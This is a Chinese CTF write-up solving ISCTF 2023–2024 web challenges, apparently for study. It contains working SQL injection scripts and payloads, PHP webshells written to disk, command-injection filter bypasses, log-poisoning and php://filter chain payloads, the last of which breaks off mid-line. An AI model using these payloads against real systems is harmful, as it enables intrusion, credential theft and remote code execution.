2023

1z_Ssql(sql注入)

username=1' or 1=1#   //illegal words!
username=1'# //用户名或密码错误
username=-1' or 1 order by 3# //回显You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=,但是没用,说明等号被过滤了
username=-1' or 1 order by 4# //用户名或密码错误
username=-1' union select 1,2,3# //illegal words!
username=union //illegal words!,尝试后双写和大写都不能绕过
username=select //用户名或密码错误
尝试布尔盲注
username=0' or if(substr(database(),1,1)=c,true,false) //测出来=,like都被过滤了

这里没思路了,扫目录发现/robots.txt,访问可得/here_is_a_sercet.php,得到源码

<?php
highlight_file("here_is_a_sercet.php");

// Blacklist check as displayed by highlight_file(): stop the request on a match, otherwise return $str unchanged.
// NOTE(review): the pattern shown here is an opaque base64 string, not a readable regex; the write-up
// treats it as SM4 ciphertext and decrypts it to recover the keyword list.
function waf($str){
$black_list = "762V08zk+xrmKxIFrdJIJj6ULvI8Lc0pX39LjDyIUb0eAGkZe4KQa87TJXuqnFw0u/669wWRsqYFya812FtULw9+tpiGlaH2gleDfDKzr+g=";
if (preg_match($black_list,$str)){
// Produces the "illegal words!" response seen while probing the login form.
die("<h4>illegal words!</h4>");
}
return $str;
}

?>

这里看wp才知道涉及到sm4加密

//sm4.js,扫目录中js可得到
const SM4 = require("gm-crypt").sm4;

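// Placeholder for the base64 ciphertext to decrypt (presumably the $black_list string from the PHP source).
var payload = "xxx";

// NOTE(review): key and mode exactly as found in the downloadable sm4.js. A key shipped to the
// client protects nothing, and ECB uses no IV, so equal plaintext blocks give equal ciphertext blocks.
let sm4Config = {
  key: "B6*40.2_C9#e4$E3",
  mode: "ecb",
  cipherType: "base64"
};
let sm4 = new SM4(sm4Config);

var result = sm4.decrypt(payload);

// The label was mojibake ("瑙e瘑:"), i.e. UTF-8 "解密:" decoded as GBK; restored here.
console.log("解密:" + result)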

image-20250330192523550

源码即为

<?php
highlight_file("here_is_a_sercet.php");

// Reject input that matches a keyword blacklist (case-insensitive), otherwise return it unchanged.
// NOTE(review): as rendered on this page the pattern is not a valid PCRE (a bare "+", and comment
// markers that contain the "/" delimiter); the escaping backslashes were presumably lost in extraction.
// NOTE(review): a keyword blacklist does not make string-built SQL safe. The query this guards is not
// shown, but the defensive fix is bound parameters rather than a longer list.
function waf($str){
$black_list = "/union|=|+|sleep|benchmark|for|where|sys|innodb|is|null|like|/*|*//i";
if (preg_match($black_list,$str)){
// Produces the "illegal words!" response seen while probing the login form.
die("<h4>illegal words!</h4>");
}
return $str;
}

?>

法一:布尔盲注

可以用二分查找来做布尔盲注:以查询成功时回显的那个hint作为真/假的判断依据。注意,黑名单中有for,而information_schema这个名字里正好包含"for"(in-for-mation),所以不能使用information_schema这个库

import requests

def force(url):
    """Recover the current database name one character at a time through a true/false oracle.

    For each position 1..199 a binary search over ASCII 32..127 asks the login form whether
    the character code is greater than the midpoint; a response containing ``hint`` is read
    as "true". Progress is printed after every character, and the loop stops at the first
    position that resolves to 32, which is treated as end of data.

    The oracle exists only because ``username`` reaches the SQL text unescaped; a
    parameterized login query removes it regardless of the keyword blacklist.
    """
    recovered = ''
    for position in range(1, 200):
        low, high = 32, 127
        while low < high:
            pivot = (low + high) // 2
            form = {
                "username": f"1' or (ascii(substr((database()),{position},1))>{pivot})#",
                "password": "1",
                "submit": "%E7%99%BB%E5%BD%95",
            }
            body = requests.post(url=url, data=form).text
            if 'hint' in body:
                low = pivot + 1
            else:
                high = pivot
        # The search never moved off the lower bound: nothing printable at this position.
        if low <= 32:
            print("未找到更多字符,库名为" + recovered)
            break
        recovered += chr(low)
        print(recovered)

def force1(url):
    """Recover ``group_concat(username)`` from ``bthcls.users`` through the same true/false oracle.

    Same search as ``force``: positions 1..199, binary search over ASCII 32..127, a response
    containing ``hint`` counts as "true", and the first position resolving to 32 ends the run.
    The table is named directly because the blacklist token ``for`` rules out
    ``information_schema``.
    """
    recovered = ''
    for position in range(1, 200):
        low, high = 32, 127
        while low < high:
            pivot = (low + high) // 2
            form = {
                "username": f"1' or (ascii(substr((select group_concat(username) from bthcls.users),{position},1))>{pivot})#",
                "password": "1",
                "submit": "%E7%99%BB%E5%BD%95",
            }
            body = requests.post(url=url, data=form).text
            if 'hint' in body:
                low = pivot + 1
            else:
                high = pivot
        # The search never moved off the lower bound: nothing printable at this position.
        if low <= 32:
            print("未找到更多字符,结果为" + recovered)
            break
        recovered += chr(low)
        print(recovered)


if __name__ == "__main__":
    # Challenge instance the write-up was solved against.
    url = "http://gz.imxbt.cn:20502"
    # Database name first, then the username column.
    force(url)
    force1(url)

这里看了wp,说的是要利用题目给的附件来进行爆破,得到表名和列名,但是没附件,就只能直接盲注;把最后查询语句中的username改成password即可得到密码

最后用 admin / we1come7o1sctf 成功登录就能回显flag

image-20250330202159431

法二:load_file读取index.php文件

首先先看下用户权限

import requests

def force(url):
    """Recover the MySQL account name (``select user()``) through the login form's true/false oracle.

    Positions 1..499 are each resolved by binary search over ASCII 32..127; a response
    containing ``hint`` counts as "true". The run ends at the first position that resolves
    to 32.

    Defensive reading: what this reveals is which account the web application connects as.
    An application account should hold only the privileges its queries need.
    """
    recovered = ''
    for position in range(1, 500):
        low, high = 32, 127
        while low < high:
            pivot = (low + high) // 2
            form = {
                "username": f"1' or (ascii(substr((select user()),{position},1))>{pivot})#",
                "password": "1",
                "submit": "%E7%99%BB%E5%BD%95",
            }
            body = requests.post(url=url, data=form).text
            if 'hint' in body:
                low = pivot + 1
            else:
                high = pivot
        # The search never moved off the lower bound: nothing printable at this position.
        if low <= 32:
            print("未找到更多字符,结果为" + recovered)
            break
        recovered += chr(low)
        print(recovered)

if __name__ == "__main__":
    # Challenge instance the write-up was solved against.
    url = "http://gz.imxbt.cn:20502"
    force(url)

image-20250330202401130

是以root身份登录到mysql的,可以用load_file读取本地文件(前提是该账号有FILE权限,且secure_file_priv没有限制目录;这也说明Web应用不应该用root连接数据库)

看启动文件/start.sh,用load_file读,注意这里要把二分查找的取值边界改成0~128(文件内容里有换行等小于32的字符)

import requests

def force(url):
    """Read ``/start.sh`` through ``load_file`` using the login form's true/false oracle.

    Positions 1..499 are each resolved by binary search over 0..128 (the range is widened so
    that control characters such as newlines are representable); a response containing
    ``hint`` counts as "true". Every resolved value is appended and the running text printed.

    Defensive reading: this only works when the database account may read server files;
    restricting FILE privilege / ``secure_file_priv`` closes it even if the injection remains.
    """
    recovered = ''
    for position in range(1, 500):
        hit = False
        low, high = 0, 128
        while low < high:
            pivot = (low + high) // 2
            form = {
                "username": f"1' or (ascii(substr((load_file('/start.sh')),{position},1))>{pivot})#",
                "password": "1",
                "submit": "%E7%99%BB%E5%BD%95",
            }
            body = requests.post(url=url, data=form).text
            if 'hint' in body:
                low = pivot + 1
            else:
                high = pivot
        recovered += chr(low)
        print(recovered)
        hit = True
        # NOTE(review): hit is set unconditionally just above, so this branch never runs
        # and the loop always walks all 499 positions.
        if not hit:
            print("未找到更多字符,结果为" + recovered)
            break

if __name__ == "__main__":
    # Challenge instance the write-up was solved against.
    url = "http://gz.imxbt.cn:20502"
    force(url)

image-20250330204135697

可以看到它把flag写入到了index.php,且泄露出了其绝对路径,直接load_file读

import requests

def force(url):
    """Read ``/var/www/localhost/htdocs/index.php`` through ``load_file`` and the login oracle.

    Positions 1..499 are each resolved by binary search over 0..128; a response containing
    ``hint`` counts as "true". Every resolved value is appended and the running text printed.
    The write-up reports that this run did not finish within half an hour.

    Defensive reading: the path was learned from the start script, and the read depends on
    the database account being allowed to read files under the web root.
    """
    recovered = ''
    for position in range(1, 500):
        hit = False
        low, high = 0, 128
        while low < high:
            pivot = (low + high) // 2
            form = {
                "username": f"1' or (ascii(substr((load_file('/var/www/localhost/htdocs/index.php')),{position},1))>{pivot})#",
                "password": "1",
                "submit": "%E7%99%BB%E5%BD%95",
            }
            body = requests.post(url=url, data=form).text
            if 'hint' in body:
                low = pivot + 1
            else:
                high = pivot
        recovered += chr(low)
        print(recovered)
        hit = True
        # NOTE(review): hit is set unconditionally just above, so this branch never runs
        # and the loop always walks all 499 positions.
        if not hit:
            print("未找到更多字符,结果为" + recovered)
            break

if __name__ == "__main__":
    # Challenge instance the write-up was solved against.
    url = "http://gz.imxbt.cn:20502"
    force(url)

但是爆了半个小时没出来,理论成立

绕进你的心里(php特性)

<?php
// Challenge source: the flag is printed only when three checks on request parameters pass.
// Each check is a known PHP pitfall; the comments name the weakness and the defensive fix.
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
// md5() of an array yields no hash (NULL with a warning before PHP 8), so two different arrays
// compare equal here. Defence: require is_string() on both inputs before hashing.
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
echo "md5绕过了!";
// preg_match() fails instead of matching when the subject is an array, and intval() of a
// non-empty array is 1, so an array passes both the digit check and the truthiness check.
if(preg_match("/[0-9]/", $num)){
die('你干嘛?哎哟!');
}
elseif(intval($num)){
// preg_match() returns false (not 0) once PCRE exceeds pcre.backtrack_limit; this `if` reads
// false as "no match". Defence: compare the result with === 0 and treat false as a rejection.
if(preg_match('/.+?ISCTF/is', $str)){
die("再想想!");
}
if(stripos($str, '2023ISCTF') === false){
die("就差一点点啦!");
}
echo $flag;
}
}
?>

数组绕过MD5,intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。PCRE回溯次数限制绕过来绕过preg_match()函数的检测

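preg_match的回溯次数有上限(pcre.backtrack_limit,默认1000000),超过这个上限时它返回false,而不是0或1;这里的if(preg_match(...))把false当成"没有匹配到",所以检测被绕过。防御上应该用 === 0 严格判断,并把false当作出错直接拒绝。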

hongmeng[]=1&shennong[]=2&zhurong[]=2023ISCTF
import requests

# Array-valued query parameters cover the md5 and intval checks of the challenge source.
url = "http://gz.imxbt.cn:20524//?hongmeng[]=1&shennong[]=2&zhurong[]=a"

# 2,500,000 filler characters ahead of the marker: long enough that the lazy `.+?` match
# exceeds PCRE's backtrack limit, so preg_match() returns false instead of a match.
padding = 'a' * (10 * 250000)
data = {'pan_gu': padding + '2023ISCTF'}
r = requests.post(url, data=data)
print(r.text)

easy_website(sql注入)

还是sql注入

username=1' or 1=1#   //根据报错发现空格,or被过滤
username=1'/**/||1# //登录成功
username=1'/**/order/**/by/**/4# //发现or被过滤
username=1'/**/oorrder/**/by/**/4# //错误列数
username=1'/**/oorrder/**/by/**/1# //用户名或密码错误
username=1'/**/union/**/select/**/database()# //union和select都被过滤
username=1'/**/uunionnion/**/sselectelect/**/1# //成功登录,1为回显位
username=1'/**/uunionnion/**/sselectelect/**/database()# //users
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users')# //users
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users')# //id,username,password,ip,time,user,password
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(passwoorrd)/**/from/**/users)# //ISCTF{6da56c3d-73fe-43f4-bdda-832edc9d1736}

webinclude(文件包含)

扫目录发现备份文件/index.bak,获得源码如下

 // Encode a string as base-26 digit pairs: for every UTF-16 code unit, push the
 // quotient (code / 26, floored) followed by the remainder (code % 26).
 function string_to_int_array(str){
   const intArr = [];
   let idx = 0;
   while (idx < str.length) {
     const code = str.charCodeAt(idx);
     intArr.push(Math.floor(code / 26), code % 26);
     idx += 1;
   }
   return intArr;
 }

// Turn each integer into the character at offset 97 ('a') plus that value and concatenate them.
function int_array_to_text(int_array){
  const letters = [];
  for (let pos = 0; pos < int_array.length; pos += 1) {
    letters.push(String.fromCharCode(97 + int_array[pos]));
  }
  return letters.join('');
}


// Client-side gate: the parameter is encoded twice and compared with a fixed string.
// Both passes are reversible, so the check hides nothing from anyone who can read this script.
const hash = int_array_to_text(
  string_to_int_array(
    int_array_to_text(string_to_int_array(parameter))
  )
);
if (hash !== 'dxdydxdudxdtdxeadxekdxea') {
  document.getElementById('fail').style.display = '';
} else {
  window.location = 'flag.html';
}

直接写个解码脚本,获得原始参数为mihoyo,直接伪协议读取就行

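def int_array_to_text(int_array):
    """Convert integers to text: each value becomes the character at code point 97 + value."""
    # Body re-indented; the listing had lost its indentation and did not parse.
    return ''.join(chr(97 + value) for value in int_array)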

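def text_to_int_array(text):
    """Convert text to integers: each character becomes its code point minus 97 ('a' -> 0)."""
    # Body re-indented; the listing had lost its indentation and did not parse.
    return [ord(char) - 97 for char in text]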

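def reverse_string_to_int_array(int_array):
    """Invert the page's ``string_to_int_array``: rebuild text from (quotient, remainder) pairs.

    Each character was stored as ``code // 26`` followed by ``code % 26``, so every
    consecutive pair ``(a, b)`` is recombined as ``a * 26 + b``.

    Raises:
        ValueError: if the input has an odd number of elements (a dangling half pair),
            instead of the bare IndexError the indexed loop would hit.
    """
    if len(int_array) % 2:
        raise ValueError("expected an even number of base-26 digits")
    # Even positions hold the quotients, odd positions the remainders.
    pairs = zip(int_array[0::2], int_array[1::2])
    return ''.join(chr(high * 26 + low) for high, low in pairs)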

# Fixed string the page's JavaScript compares the doubly encoded parameter against.
hash_value = "dxdydxdudxdtdxeadxekdxea"

# Undo the outer encoding pass: letters -> base-26 digits -> intermediate text.
int_array_from_hash = text_to_int_array(hash_value)
intermediate_str = reverse_string_to_int_array(int_array_from_hash)

# Undo the inner pass the same way to recover the original parameter.
final_parameter = reverse_string_to_int_array(
    text_to_int_array(intermediate_str)
)

print("原始参数 (parameter):", final_parameter)
mihoyo=php://filter/read=convert.base64-encode/resource=flag.php

$flag = “ISCTF{00b0c051-8782-48b7-9c65-fc8686418395}”;

Where is the flag

<?php
// The flag is split into 3 parts scattered in different places: xxxxxxxx, xxxx, xxx.
highlight_file(__FILE__);

// A standard one-line webshell~
// NOTE(review): eval() runs whatever PHP the POST field "1" contains, i.e. code execution by design.
eval($_POST[1]);
?>
1=system("ls");   //flag.php index.php
1=system("tac flag.php"); //FLAG1:ISCTF{Y0u_6u
1=system("tac /flag"); //FLAG2:cceeded_in_f
1=system("tac /flag.sh"); //FLAG3=ind1n9_f1ag}

ISCTF{Y0u_6ucceeded_in_find1n9_f1ag}

。。。。。结果错了,又去看了下题,原来在环境变量中

image-20250411000008626

ISCTF{8e1a7953-1020-486b-af07-9a0a7c53c9cc}

Fuzz!

<?php
/*
Read /flaggggggg.txt
Hint: you need to learn to fuzz; checking the keyboard key by key has no soul
Background: the curl command can also be used to read files, e.g. curl file:///etc/passwd
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
// Default target, used unless the request supplies an acceptable replacement below.
$file = 'file:///etc/passwd';
// Character blacklist on the raw parameter. The pipe, braces, brackets, dot, dash and slash are not
// listed (the write-up's fuzzing confirms this), so shell syntax built from them passes.
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
die('你需要fuzz一下哦~');
}
// Only a value without "fi", "le" or "flag" (case-insensitive) replaces the default.
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
$file = $_GET['file'];
}
// $file is concatenated unquoted into a shell command line, so any metacharacter the blacklist
// misses becomes command injection. Defence: escapeshellarg(), or better, no shell at all and
// an allowlist of URL schemes and hosts.
system('curl '.$file);

image-20250411000237916

fuzz一下可以看到-./{|}[]被放出来了

遇到这种可以先考虑绕过

file=127.0.0.1|ls /  //flag flaggggggg.txt
file=127.0.0.1 | tac /f[j-m]aggggggg.txt

ISCTF{Fuzz_is_a_great_trick_Did_you_find_curly_braces?-Jay17}

也可以按照题目给的提示,用大括号绕过

file=f{i}l{e}:///f{l}aggggggg.txt

。。。。。。。。。。。。。虽然但是,怎么又是在环境变量中

image-20250411001140277

ISCTF{cb477fe0-d027-457f-a3e1-2160f114f13d}

wafr

<?php
/*
Read /flaggggggg.txt
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

// Four keyword/character blacklists are applied to the raw $_POST['code'] string before it is
// evaluated. NOTE(review): matching keywords in the raw string does not describe what is finally
// executed; the payloads in this write-up pass all four lists.
if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){//strings
die("想读我文件?大胆。");
}
elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){
die("无字母数字RCE?大胆!");
}
elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){
die("奇技淫巧?大胆!!");
}
elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){
die("大胆!!!");
}
else{
// assert() given a string evaluates it as PHP code on PHP 7 and earlier (string assertions were
// removed in PHP 8), so this line is code execution on request data.
// Defence: never pass request data to assert() or eval().
assert($_POST['code']);
}

简单rce,直接命令执行绕过就行

code=system("ls")?>    //flaggggggg.txt index.php
code=system("ta\c f*")?>

预期解应该是用strings

code=system("strings f*")?>

ez_ini

常规传.user.ini不行,过滤了文件内容中的<,导致php代码不能被执行,那么可以尝试通过.user.ini和日志文件配合进行日志注入

user.ini:auto_append_file=/var/log/nginx/access.log
UA:<?php eval($_POST[123]);?>

2024

1z_php

<?php
highlight_file('index.php');

# A one-line webshell, mysterious and strange

if(isset($_POST['J'])){
$call=$_POST['J'];
// Case-insensitive substring blacklist of file-reading command names.
// NOTE(review): the list names only ten commands and is matched against the raw string, not
// against what the shell resolves, so it cannot bound what system() below will run.
$dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od'];
foreach ($dangerous_commands as $command) {
if (preg_match("/$command/i", $call)) {
die("这些个危险函数可不兴使啊");
}
}
// Request data is executed as a shell command line. Defence: do not expose system() to input;
// where a command is unavoidable, use a fixed command with escapeshellarg() on each argument.
system($call);
}
?>

ban了些读取文件的命令,可使用strings绕过

读取绕过

J=ls
J=strings /f14g #strings会提取文件中的可打印字符
J=ca\t /f14g #反斜杠绕过
J=grep { /f14g #grep是用来查找字符串的,在这里我们查找{他会输出含有{的那一行
J=c''at /f14g #''在bash中会被解释为空字符串,当flag被禁时也可以用
J=cp /f14g /var/www/html/index.php #将/f14g的内容拷贝到index.php,index.php的内容会被覆盖

image-20250203163711839

传马

false:J=echo '<?php @system($_POST['123']);?>' > a.php
true:J=echo '<?php @eval($_POST['123']);?>' > a.php

然后蚁剑访问a.php连接后就可以获得flag了

但是在这里就涉及到第一次传马失败的知识点,system()函数和eval()函数区别

补充:system()函数和eval()函数区别

区分

eval类型函数是代码执行而不是命令执行(一句话木马)

system类型函数是命令执行而不是代码执行

具体来说,就是eval()函数将字符串作为PHP代码执行,可以执行任何合法的PHP语句或表达式,而system()函数调用操作系统的命令解释器(如Shell)来执行指定的命令

举例

<?php
eval("echo 1+1;"); //2
system("echo 1+1;"); //1+1;
?>


<?php
$num=1;
eval("\$a = $num;"); //有效,$a=1
system("\$b = $num;"); //无效,$b=NULL
?>

代码执行函数

1-eval
<?php eval($_POST["cmd"]) ?>

2-assert
<?php assert($_POST["cmd"]) ?>

3-call_user_func
<?php
call_user_func($_POST["fun"],$_POST["para"])
?>
//post:fun=assert&para=phpinfo();

4-create_function
<?php
$a= $_POST['func'];
$b = create_function('$a',"echo $a");
$b('');
?>
//post:func=phpinfo();

5-array_map
<?php
$array = array(0,1,2,3,4,5);
array_map($_GET['func'],$array);
?>
//get:func=phpinfo

命令执行函数

1-system
<?php system($_POST["cmd"]);?>

2-passthru
<?php passthru($_POST["cmd"]);?>

3-exec
<?php echo exec($_POST["cmd"]);?>

4-pcntl_exec
<?php
pcntl_exec("/bin/bash",array($_POST["cmd"]));
?>

5-shell_exec
<?php echo shell_exec($_POST["cmd"]); ?>

6-popen()/proc_open()
<?php $handle = popen("/bin/ls","r");?>

7-``
<?php echo `whoami`?>

8-
<?php
$cmd = 'system';
ob_start($cmd)
echo "$_GET[a]";
ob_end_flush();
?>
//?a=whoami

c71ce3259d0c7fbd0cff3db9aa266d10

224dbf35c723734d5b4c51efff2a7042

25时晓山瑞希生日会

image-20250204164050726

进入环境就提示需要Project Sekai的客户端请求,抓包更改UA

User-Agent: Project Sekai

然后要正确时间,根据题目描述添加时间 不知道年月日好像随便一个都行?

Date:Tue, 15 Nov 2010 9:15:31 GMT

image-20250204164500754

提示本地来,添加X-Forwarded-For

X-Forwarded-For:127.0.0.1

image-20250204164550076

好吧,还是限制了时间,更改时间就行

Date:Tue, 15 Nov 2024 05:01:31 GMT

image-20250204164714902

又结束了?????再改时间吧

Date:Tue, 15 Nov 2024 25:01:31 GMT

image-20250204164924905

提示格式不对,搜索后更改格式和时间

Date: Sun, 27 Aug 2024 05:00:00 GMT

image-20250204165355864

拿到flag

UP!UPloader

随便上传一个文件发现有include.php,访问发现为文件包含

image-20250204165752103

filename=php://filter/read=convert.base64-encode/resource=upload.php

成功读取文件内容,解码后源码如下

<?php
// Upload handler recovered through the include.php file read: stores the uploaded file under
// ./uploads/ as md5(original file name) plus the original extension.
error_reporting(0);
$file = $_FILES['file'];
if (isset($file) && $file['size'] > 0) {
// Both parts come from the client-supplied file name; no extension allowlist or content check follows.
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
$name = pathinfo($file['name'], PATHINFO_FILENAME);
$dir_name = $name . '.' . $ext;
$upload_dir = './uploads/';
if (!is_dir($upload_dir)) {
mkdir($upload_dir, 0755, true);
}
// NOTE(review): the stored name is a plain md5 of the original name, so anyone who knows what was
// uploaded can compute the path, and the client's extension is kept as is. Defence: allowlist
// extensions, generate random names, and keep uploads where the server will not execute them.
if (move_uploaded_file($file['tmp_name'], $upload_dir . md5($dir_name) . '.' . $ext)) {
echo "文件上传成功!不过文件路径可不好找呀~什么?什么include.php?我不知道啊。" ;
} else {
echo "文件存储失败,未知原因......";
}
die();
}
?>

image-20250204170217426

因此直接访问上传目录下的md5加密后文件名传马即可

这里我传的是1.php,加密后为f3b94e88bd1bd325af6f62828c8785dd.php,蚁剑连接就行

image-20250204170950538

其实没找到,flag藏在phpinfo()页面了,除了phpinfo();还可以通过system('env');找到

image-20250204171435076

image-20250204171637956

ezrce

<?php

error_reporting(0);

if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];

// Case-insensitive blacklist of command names, function names, the space and a few shell operators.
// NOTE(review): it is matched against the raw string, while eval() below runs the result of
// evaluating that string, so names assembled or decoded at run time are never seen by this check.
if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
die("Blocked by security filter!");
} else {
// Code execution on request data. Defence: remove the eval(); no blacklist makes this safe.
eval($cmd);
}
} else {
highlight_file(__FILE__);
}
?>

ban了挺多函数,但是十六进制那个未被ban,因此直接绕过

cmd=(sy.(st).em)(hex2bin("6c73202f"));  //十六进制为ls /
cmd=(sy.(st).em)(hex2bin("636174202f666c6167")); //十六进制为cat /flag

其他payload

cmd=passthru('cd%09..;cd%09..;cd%09..;strings%09[a-z]lag'); //system 可以用 passthru 代替,过滤了 /,可以通过 cd .. 进行绕过,然后文件读取同样 strings 即可
cmd=include$_GET[1];&1=php://filter/convert.base64-encode/resource=/flag

小蓝鲨的冒险

<?php
// Challenge source: the flag is echoed after three checks that each rely on loose typing.
error_reporting(0);
highlight_file(__FILE__);
$a = "isctf2024";
$b = $_GET["b"];
// parse_str() without a result array writes the parsed variables into the current scope, so the
// request can overwrite $a (this form was removed in PHP 8). Defence: always pass a result array.
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { // pass in, via the array, a value whose MD5 starts with 0e, e.g. 240610708
// NOTE(review): == compares two "0e<digits>" hashes as numbers, both zero. Defence: === or hash_equals().
$num = $_POST["num"];
if($num == 2024){
die("QAQ");
}
if(preg_match("/[a-z]/i", $num)){
die("no no no!");
}
if(intval($num,0) == 2024){ // bypass with a decimal fraction or with octal notation
// intval() with base 0 picks the base from the string's prefix and drops any fractional part,
// so it accepts spellings that the == 2024 test above does not recognise.
if (isset($_GET['which'])){
$which = $_GET['which'];
// switch compares loosely, and case 0 has no break, so it falls through into the require_once.
// NOTE(review): $which is request data concatenated into an include path. Defence: map an
// allowlisted key to a fixed file name.
switch ($which){
case 0:
print('QAQ');
case 1:
case 2:
require_once $which.'.php';
echo $flag;
break;
default:
echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
break;
}
}
}
}

payload

GET b=a[0]=240610708&which=flag
POST num=2024.1或num=03750

image-20250204174928730

千年樱

第一层

先添加cookie

cookie:from=ISCTF

image-20250204180054510

第二层

<?php
include "dir.php";
highlight_file(__FILE__);

// file_get_contents() receives request data as the path, so the caller may name any stream
// wrapper PHP has enabled, not only a file on disk, and thereby chooses the content compared here.
// Defence: never open paths taken from input; if a file must be chosen, map a key to a fixed path.
if(file_get_contents($_POST['name']) === 'ISCTF'){
echo $dir2;
}
else{
die("Wrong!");
}
?>

直接用data伪协议

name=data://text/plain,ISCTF

image-20250204180351322

第三层

<?php
include "dir.php";
highlight_file(__FILE__);

// Stop the request when $str contains http, php, file, ':', '=', '/' or '?' (case-insensitive).
// NOTE(review): '|', '.' and '-' are not covered, which is all a chain of filter names needs.
function waf($str){
if(preg_match("/http|php|file|:|=|\/|\?/i", $str) ){
die('bad hacker!!!');
}
}
$poc = $_POST['poc'];
waf($poc);
// Request data is interpolated into the stream-wrapper URL, so the caller decides which filters
// run over badChar.txt and therefore what $result contains.
// Defence: choose filters from a fixed allowlist, never from input.
$filename = "php://filter/$poc/resource=/var/www/html/badChar.txt";
$result = file_get_contents($filename);
if($result === "sakura for ISCTF"){
echo "yes! master!";
// eval() on request data: code execution once the comparison above is satisfied.
eval($_POST['cmd']);
}

// Debug aid that dumps $result. The loose == and is_numeric() disagree on some strings under
// PHP 7 comparison rules, which is what lets both conditions hold at once.
if($_GET['output'] == 114514 && !is_numeric($_GET['output'])){
var_dump($result);
}


?>

 我们可以用神奇的php_filter_chain_generator工具构造filter链:

python php_filter_chain_generator.py --chain sakura for ISCTF<?php
poc=convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base6
